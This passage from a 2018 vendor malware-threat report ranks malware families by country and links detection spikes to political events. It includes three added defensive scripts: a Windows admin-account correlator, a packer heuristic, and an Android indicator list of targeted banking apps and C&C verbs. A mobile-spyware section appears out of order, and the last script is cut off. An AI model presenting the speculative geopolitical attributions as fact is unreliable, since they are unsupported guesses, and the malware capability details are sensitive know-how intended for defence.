5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has plagued the planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest numbers of worm infections.

Finally, the timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that, besides mailing copies of themselves to harvested addresses, they can travel between victim computers via exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018: Russia experienced rather frequent Email Worm challenges, Germany had the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory-resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia suffered not one p2p Worm outbreak but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, the "IM" or instant-messaging worm, sends malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos worm; in 2012 the FBI arrested 10 people for spreading banking malware via social networks with Yahos.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: backdoors, viruses, trojans and exploits. In contrast to worms, these types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. Once installed on a system or network, however, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common backdoor Comodo detected in Q2 2018 was DarkComet, a remote access trojan (RAT) that is a full 10 years old. It lets an attacker control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo's backdoor detections in Q2.

The UK's backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot move to another computer unless a user moves the infected file or takes some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries, especially developing countries, were affected.

This timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically trojans grant remote attackers the same rights and privileges as the local user and can be used for many kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the Administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for trojans according to Comodo detections.

And this timeline shows when this huge trojan infestation took place: at the beginning of June 2018.
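The Starter behaviour Microsoft describes, a new account created and dropped into the Administrators group, is visible in the Windows Security log as event 4720 (user account created) followed by 4732 (member added to a security-enabled local group). The following Python script is an added example for this edition, not Comodo's or Microsoft's code: it correlates the two events within a short window and flags creations performed by a machine account or SYSTEM, which indicates a process rather than a person at a console. The JSON-lines format and the sample events are constructed for the example.

```python
"""Correlate Windows Security events 4720 (user account created) and 4732
(member added to a security-enabled local group) to catch a freshly created
account being made a local administrator.  Events are read as JSON lines in
the shape a log forwarder produces; the sample lines below are constructed.
"""
import json
from datetime import datetime, timedelta

# The built-in Administrators group is S-1-5-32-544 in every locale; the
# display name is localized, so match on the SID first and names as a fallback.
ADMIN_GROUP_SID = "S-1-5-32-544"
ADMIN_GROUP_NAMES = {"Administrators", "Administratoren", "Administrateurs"}
DEFAULT_WINDOW = timedelta(minutes=10)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def correlate(jsonl, window=DEFAULT_WINDOW):
    """Return one alert per account that was created and elevated within `window`."""
    events = [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]
    events.sort(key=lambda e: e["time"])
    created = {}   # new account SID -> its 4720 event
    alerts = []
    for ev in events:
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = ev
        elif ev["id"] in (4732, 4728):   # 4728: global group variant
            is_admin_group = (ev.get("TargetSid") == ADMIN_GROUP_SID
                              or ev["TargetUserName"] in ADMIN_GROUP_NAMES)
            born = created.get(ev["MemberSid"])
            if not (is_admin_group and born):
                continue   # existing account, or a non-admin group: routine
            delay = _ts(ev["time"]) - _ts(born["time"])
            if delay <= window:
                creator = born["SubjectUserName"]
                alerts.append({
                    "host": ev["host"],
                    "account": born["TargetUserName"],
                    "sid": born["TargetSid"],
                    "created_by": creator,
                    "seconds_to_admin": int(delay.total_seconds()),
                    # A machine account ($) or SYSTEM creating users means a
                    # process did it, not an administrator at a console.
                    "automated": creator.endswith("$") or creator.upper() == "SYSTEM",
                })
    return alerts


# Constructed sample log (not real telemetry).  Lines 3 and 4 are the
# Starter-style pattern; the others are routine account management.
SAMPLE_LOG = """
{"time":"2018-06-04T09:00:00","id":4720,"host":"WS07","SubjectUserName":"jdoe","TargetUserName":"intern1","TargetSid":"S-1-5-21-1-2-3-1201"}
{"time":"2018-06-04T09:00:03","id":4732,"host":"WS07","SubjectUserName":"jdoe","TargetUserName":"Users","TargetSid":"S-1-5-32-545","MemberSid":"S-1-5-21-1-2-3-1201"}
{"time":"2018-06-04T12:00:05","id":4720,"host":"WS07","SubjectUserName":"WS07$","TargetUserName":"svc_remote","TargetSid":"S-1-5-21-1-2-3-1105"}
{"time":"2018-06-04T12:00:07","id":4732,"host":"WS07","SubjectUserName":"WS07$","TargetUserName":"Administrators","TargetSid":"S-1-5-32-544","MemberSid":"S-1-5-21-1-2-3-1105"}
{"time":"2018-06-04T15:30:00","id":4732,"host":"WS07","SubjectUserName":"jdoe","TargetUserName":"Administrators","TargetSid":"S-1-5-32-544","MemberSid":"S-1-5-21-1-2-3-1001"}
"""

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"[{a['host']}] {a['account']} ({a['sid']}) created by {a['created_by']} "
              f"and made admin after {a['seconds_to_admin']}s; automated={a['automated']}")
```

The last sample line, an existing account added to Administrators by a named administrator, is deliberately not alerted: it is the normal case this rule must stay quiet on, and it belongs to a separate, lower-priority detection.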


5.2.4 Exploits

Computer exploits comprise software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched quickly once discovered, and an exploit loses value as soon as its targets are updated.

In Q2 2018 the majority of exploits Comodo detected targeted a favorite hacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating system.

Japan and India were the two countries where Comodo detected the majority of exploit activity in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: email flooders, constructors, jokes, virtual tools and malware packers.


5.3.1 Constructor

Constructors are applications that automatically generate malware files.

For Q2, Alamar was the #1 constructor Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for constructors.

And this timeline shows not only that Germany had a serious problem with constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to malicious executable code that is hidden or obfuscated by compressing ("packing") it inside a larger, seemingly innocuous program or data stream; the hostile code can even be a script. The compressed data carries a separate decompression stub, or is a self-extracting archive, that recreates the original code from the compressed data at runtime and then executes the malware. Encryption may also be layered on to conceal the malware from security software.

MUPX, or modified UPX (the "Ultimate Packer for eXecutables"), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems and uses the open-source UCL compression algorithm, whose decompressor is only a few hundred bytes of code.

In Q2 2018 Russia was the #1 home of malware packers.

This timeline shows that Russia had the most persistent packer problems, while Iran had the highest periodic spikes.
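A stock UPX-packed file is easy to spot by its section names, but a modified UPX build renames them, which is exactly why MUPX is a separate detection. The following Python script is an added example for this edition, not Comodo's detection logic: it classifies a PE section table by three signals, the stock UPX names, the UPX memory layout with the names changed, and per-section Shannon entropy. The section data is constructed; on a real file the table would come from pefile or a similar parser, and the entropy threshold is an assumed working value.

```python
"""Packer heuristics over a PE section table, the check an analyst runs
before deciding whether a sample needs unpacking.  Three signals: the
standard UPX section names, the UPX memory layout with the names changed
(what a modified UPX build leaves behind), and the Shannon entropy of each
section's raw bytes.  Section data below is constructed.
"""
import math
import random

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.2   # bits per byte; compressed or encrypted data sits near 8


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def classify_sections(sections):
    """sections: list of (name, virtual_size, raw_bytes) in file order.

    Returns {"verdict": str, "sections": [per-section stats]}.
    """
    stats = [{"name": name, "vsize": vsize, "rsize": len(raw),
              "entropy": round(shannon_entropy(raw), 2)} for name, vsize, raw in sections]
    names = {s["name"] for s in stats}
    if names & UPX_SECTION_NAMES:
        verdict = "upx"
    elif (len(stats) >= 2 and stats[0]["rsize"] == 0 and stats[0]["vsize"] >= 0x1000
          and stats[1]["entropy"] >= HIGH_ENTROPY):
        # UPX layout with renamed sections: an empty first section that is large
        # in memory (where the stub unpacks the original image), followed by the
        # high-entropy packed blob.
        verdict = "upx-like (renamed sections)"
    elif any(s["entropy"] >= HIGH_ENTROPY for s in stats):
        verdict = "packed or encrypted section"
    else:
        verdict = "unpacked"
    return {"verdict": verdict, "sections": stats}


# Constructed section data (not taken from any real sample).
_rng = random.Random(2018)
PACKED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))   # stands in for compressed code
PLAIN_CODE = b"\x55\x8b\xec\x83\xec\x10" * 200 + b"\x00" * 400    # prologue-like bytes plus padding

UPX_SAMPLE = [("UPX0", 0x20000, b""), ("UPX1", 0x1000, PACKED_BLOB), (".rsrc", 0x400, b"\x00" * 1024)]
MUPX_SAMPLE = [(".text", 0x20000, b""), (".data", 0x1000, PACKED_BLOB), (".rsrc", 0x400, b"\x00" * 1024)]
PLAIN_SAMPLE = [(".text", 0x700, PLAIN_CODE), (".data", 0x200, b"\x00" * 512)]

if __name__ == "__main__":
    for label, sample in (("upx", UPX_SAMPLE), ("mupx", MUPX_SAMPLE), ("plain", PLAIN_SAMPLE)):
        result = classify_sections(sample)
        print(f"{label}: {result['verdict']}")
        for s in result["sections"]:
            print(f"  {s['name']:<8} vsize={s['vsize']:#x} rsize={s['rsize']} entropy={s['entropy']}")
```

Packing is not malice on its own: plenty of legitimate installers ship UPX-packed, so the verdict is a reason to unpack and look, not a conviction. The renamed-layout rule is the one that matters for MUPX, since a signature that only knows the UPX0/UPX1 names sees nothing.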


5.3.3 Email Flooder

Email flooders are tools used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one email flooder Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behaviour was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that modify or alter malicious files to avoid detection.

The top Virtual Tools Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humour, or simply to annoy the user for a brief period of time.

Such malware is typically labelled only a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat: Malware Applications

In this section we cover a range of malicious functionality that Comodo detected within applications, unwanted applications and unsafe applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and run such software on purpose. Comodo nevertheless detects and flags such applications as malicious because they exhibit behaviour of which users may be unaware, including extreme efforts to track user behaviour and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behaviour and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming in that users often install these applications inadvertently in the course of ordinary computer and Internet activity. They include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage and search provider, and perform other actions users may not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unlicensed copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine the unique malware profiles Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: backdoors, trojans, viruses and worms. It also lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now can also target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just before its gubernatorial election in 2017. One caveat when reading such statistics: "Kryptik" is a heuristic family name that several vendors apply to packed or obfuscated droppers, so the label groups code from many unrelated campaigns.

Second, let's examine "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social-engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware found in every vertical and used for a wide variety of cyberattacks. Strategic analysis like this can be used to create a unique malware profile for each vertical and to provide cyber intelligence that clarifies the primary malware threats and focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on that day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, including many requests for information on upcoming changes in US political, military and intelligence activities, and immediately began to fulfil them via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is likely that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo's trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to connect with the outside world. Comodo researched the detected malware further and identified it as Windows activation ("cracking") software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are now performed mostly online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Vantaa, the city neighbouring Helsinki, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The rise in trojan detections last quarter suggests that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact surfacing in quarters to come. Just as important, trojans serve as a delivery vector for other types of malware. Taken together, these facts point to a large surge in host infections worldwide with a diverse set of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, which presages new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, a further dangerous tendency emerges: cybercriminals' accelerating bias toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably to revamp their security strategy, policies and posture.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.

Disguises of Desert Scorpion: Version 1 posed as Dardesh, Google Play Services and Instant Apps; Version 2 posed as Settings.

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone, a feature set found in spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Disguises of Zoo Park:
Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:
• Enable and disable the GPS services
• Record audio and send it to the Command & Control server
• Upload image files
• Collect information about the applications installed
• Collect browser data
• Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:
• Extracts photos, audio and videos
• Records the screen
• Executes shell commands
• Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Disguises of MikeSpy: Virtual Girlfriend

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it brings a bundle of malicious abilities:
• Takes control of the Bluetooth adapter
• Extracts data about accounts, contact details and installed apps
• Extracts data from the WhatsApp message DB and the related keys
• Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It uses trustworthy-looking cover icons imitating Facebook and Google Chrome.

Disguises of Xloader: Versions 1 to 3 posed as Facebook and Chrome.

After infection Xloader connects to its C&C server and executes the following commands:
• Extract the device information
• Delete SMS
• Set ringer mode
• Monitor incoming SMS messages
• Clear memory
• Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
• Extract contact details
• Set Wi-Fi to always on

Version 2 can execute additional commands:
• Send SMS and read outgoing SMS
• Enable and disable a Wi-Fi connection
• Access a location specified by the attackers
• Make recordings
• Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

Disguises of Stalker Spy (app: distribution names):
FlexiSpy: MBackup
HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

In addition to the usual must-have spyware set, Stalker Spy can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and Mobile Spy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a 007 licence.

Disguises of Mystery Bot: Version 1 posed as Adobe Flash Player; Version 2 as Flash Player.

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
• Send_SMS: extract SMS content and send it to the C&C server
• Send_USSD: send the USSD to the C&C server
• Gethistory: monitor browser history
• Start_AllApp: gather info about installed applications
• Send_call: set the Intent action to make a call
• Forward_call: forward incoming calls
• ResForward_call: reset call forwarding
• Go_Smsmnd: delete SMS content
• Go_GetAlls: get SMS history
• Dell_sms: delete SMS content in a conversation
• Send_spam: send spam SMS
• Start_Inject: call the injector class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

Disguises of FakeSpy: 佐川急便, 현대캐피탈

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:
• contacts: get contact details and email id
• Mute: set action to mute
• Mms: get MMS content
• info: get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Disguises of RedAlert:
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
• de.postbank.finanzassistent
• pl.mbank
• aib.ibank.android

The second version can also block access to some applications and services, including Google Chrome, the Google Play store, Gmail and YouTube.
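As an added example (not code from the report), the following Python script turns the indicators listed above for Xloader, MysteryBot and RedAlert into the kind of string-based triage check an analyst runs over a decoded APK or classes.dex before deeper analysis: it extracts printable strings the way strings(1) does, matches them against each family's target banking package names and C&C command verbs (also in the Lcom/kbstar/kbbank; descriptor form that Dalvik uses), and reports the best-matching family. FakeSpy's command words (contacts, info, Mute, Mms) are too generic to serve as indicators and are deliberately left out. The sample blobs are constructed for the example and are not real malware.

```python
import re

# Family indicators drawn from the report's listings above: target banking package
# names (Xloader, RedAlert) and C&C command verbs (MysteryBot).
FAMILY_INDICATORS = {
    "Xloader": {
        "com.wooribank.pib.smart", "com.kbstar.kbbank", "com.ibk.neobanking",
        "com.sc.danb.scbankapp", "com.shinhan.sbanking",
        "com.hanabank.ebk.channel.android.hananbank", "nh.smart",
        "com.epost.psf.sdsi", "com.kftc.kjbsmb", "com.smg.spbs",
    },
    "MysteryBot": {
        "Send_SMS", "Send_USSD", "Gethistory", "Start_AllApp", "Send_call",
        "Forward_call", "ResForward_call", "Go_Smsmnd", "Go_GetAlls",
        "Dell_sms", "Send_spam", "Start_Inject",
    },
    "RedAlert": {"de.postbank.finanzassistent", "pl.mbank", "aib.ibank.android"},
}

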